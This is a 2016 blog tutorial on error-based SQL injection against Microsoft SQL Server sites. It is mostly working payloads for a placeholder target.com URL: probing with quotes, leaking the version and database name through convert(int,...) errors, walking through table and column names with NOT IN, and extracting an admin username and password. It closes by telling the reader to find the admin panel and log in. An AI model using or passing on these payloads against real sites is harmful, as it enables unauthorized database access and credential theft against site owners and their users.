Thứ Sáu, tháng 4 15, 2016

MSSQL INJECTION


This article is related to mssql Injection.
There are few ways to determine the vulnerability for this
injectionyou can put quote (') at the end of url and it will show
error like

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the ID integer '5' '.
index.asp, line 30

www.target.com/index.asp?id=1 and 1=1-- Load Perfect

www.target.com/index.asp?id=1 and 1=2-- Mssql Error

if 1=1 does make it load perfectly we may need to put quote (string) '+and+1=1--+-
okay in our case we have mssql error page

FIND DATABASE, VERSION

mssql injection queries are not really difficult :) if you have good knowledge in mysql injection, its not that tough for you ..
SO I will not be covering on mysql injection basics :)
watch my previous tutorials
How we can find our database?

+and+1=convert(int,@@version)--

IN URL:

www.target.com/index.asp?id=1'+and+1=convert(int,@@version)--

and like it we can find our database by using this query

+and+1=convert(int,db_name())--

IN URL:

www.target.com/index.asp?id=1'+and+1=convert(int,db_name())--
and same for user name
'+and+1=convert(int,user_name())--

Extracting Table names from database

We Will be using NOT IN method to find table names
we can only fetch table names one by one. that is really pain in ...... :p
so lets fetch first table name from database , our query will be like

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-

real time example

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-

lets say our first table is : table1
lets now find 2nd table name, then our query will be like

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1')))--

Real time example:

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1')))--

and for third table we use


www.target.com/index.asp?id=1+and+1=convert
(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1','table2')))--

Fiding Column names

okay so now we have our table names but we dont know how to find column names in those tables?
lets say we want to find columns of table1
we will be using this query

+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'))--

In URL it will be like

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'))--

Note: table1 is the name of table

Now Lets see the error message

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
index.asp, line 30

So if we look carefully we will see column name in this error that is "username"

Now.. we have our first column name, how to find next column?
We will be using this query

+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+
where+table_name='table1'+and+column_name+not+in+('username')))--

in URL

www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'+and+column_name+not+in+('username')))--

okay lets say this time error show the column_name is 'Password'
So this is how things work in NOT IN method.


okay, Now we have tables and their column names but we dont know how to extract entries from these tables and columns

lets say we have column name username in table table1. To get its entries we will use query like:


+and+1=convert(int,(select+top+1+username+from+table1))--
Error will be like

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin@site' to data type int.

index.asp, line 30

admin@site is our required username

and so for password we will use

+and+1=convert(int,(select+top+1+password+from+table1))--

In URL:

www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+username+from+table1))--

Error will be like

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'adminPass123' to data type int.

index.asp, line 30

SO now we have admin username and admin Password. Just find the admin panel and bangg

Thanks for reading this tutorial

regard's